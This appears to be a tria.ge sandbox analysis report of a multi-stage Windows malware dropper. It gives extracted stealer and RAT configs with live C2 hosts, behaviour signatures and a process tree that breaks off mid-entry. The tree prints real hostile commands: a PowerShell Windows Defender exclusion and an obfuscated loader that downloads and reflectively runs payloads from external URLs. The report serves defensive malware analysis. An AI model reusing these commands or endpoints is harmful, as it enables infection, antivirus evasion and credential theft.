Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/03/2025, 02:41

General

  • Target

    c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe

  • Size

    1.9MB

  • MD5

    5b1dbccb1977e33fae7e0efa78e96b49

  • SHA1

    fd97d5e5080b0130e21f998ed33b47997dd87d84

  • SHA256

    c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77

  • SHA512

    62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8

  • SSDEEP

    49152:GbH3jNl9hAMO18bTKiyyGqxcyO1iQwLoFha7:GbHB72buXmA0iVLoFC

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

redline

Botnet

Build 7

C2

101.99.92.190:40919

Extracted

Family

lumma

C2

https://fostinjec.today/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://5orangemyther.live/api

https://sfostinjec.today/api

https://rsterpickced.digital/api

https://defaulemot.run/api

https://.garagedrootz.top/api

https://orangemyther.live/api

https://sterpickced.digital/api

https://j8arisechairedd.shop/api

https://gmodelshiverd.icu/api

https://biochextryhub.bet/api

https://q8explorebieology.run/api

https://gadgethgfub.icu/api

https://moderzysics.top/api

https://5ktechmindzs.live/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

  • pastebin_url

    https://pastebin.com/raw/H3wFXmEi

Extracted

Family

lumma

C2

https://moderzysics.top/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • VenomRAT 1 IoCs

    Detects VenomRAT.

  • Venomrat family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 17 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 44 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 17 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3440
      • C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
        "C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3172
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4236
          • C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe
            "C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:664
            • C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe
              "C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2892
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 788
              5⤵
              • Program crash
              PID:4964
          • C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe
            "C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4556
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3336
              • C:\Windows\SysWOW64\expand.exe
                expand Ae.msi Ae.msi.bat
                6⤵
                • System Location Discovery: System Language Discovery
                PID:5028
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4048
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "opssvc wrsa"
                6⤵
                  PID:3008
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1772
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                  6⤵
                    PID:5100
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 789919
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:2740
                  • C:\Windows\SysWOW64\extrac32.exe
                    extrac32 /Y /E Deviation.msi
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1140
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V "Brian" Challenges
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:4596
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:3904
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:5016
                  • C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
                    Occupation.com q
                    6⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:4496
                    • C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                      C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                      7⤵
                      • Executes dropped EXE
                      PID:4012
                    • C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                      C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2384
                  • C:\Windows\SysWOW64\choice.exe
                    choice /d y /t 5
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:3272
              • C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe
                "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
                4⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                PID:4488
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3780
                • C:\Users\Admin\AppData\Local\Temp\micC4D2.tmp.exe
                  C:\Users\Admin\AppData\Local\Temp\micC4D2.tmp.exe
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5348
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
                  5⤵
                    PID:4364
                • C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe
                  "C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:512
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd.exe /c 67cc62a429f2f.vbs
                    5⤵
                    • Checks computer location settings
                    • Modifies registry class
                    PID:3868
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
                      6⤵
                      • Checks computer location settings
                      PID:2816
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2628
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                          8⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4660
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                            9⤵
                              PID:4912
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                              9⤵
                                PID:2164
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:616
                    • C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe
                      "C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"
                      4⤵
                      • Executes dropped EXE
                      PID:2736
                      • C:\Windows\SYSTEM32\schtasks.exe
                        "schtasks" /create /sc minute /mo 1 /tn MyTask /tr ""C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Suh\niga.jar"" /F
                        5⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:3904
                    • C:\Users\Admin\AppData\Local\Temp\10148390101\8a1e512b60.exe
                      "C:\Users\Admin\AppData\Local\Temp\10148390101\8a1e512b60.exe"
                      4⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Downloads MZ/PE file
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      PID:5428
                      • C:\Users\Admin\AppData\Local\Temp\SKO53PK432SKFGU9P1PE0JNLPLN.exe
                        "C:\Users\Admin\AppData\Local\Temp\SKO53PK432SKFGU9P1PE0JNLPLN.exe"
                        5⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        PID:5696
                    • C:\Users\Admin\AppData\Local\Temp\10148400101\852937cf9d.exe
                      "C:\Users\Admin\AppData\Local\Temp\10148400101\852937cf9d.exe"
                      4⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      PID:5916
                    • C:\Users\Admin\AppData\Local\Temp\10148410101\2d911a7926.exe
                      "C:\Users\Admin\AppData\Local\Temp\10148410101\2d911a7926.exe"
                      4⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:4964
                      • C:\Windows\SysWOW64\taskkill.exe
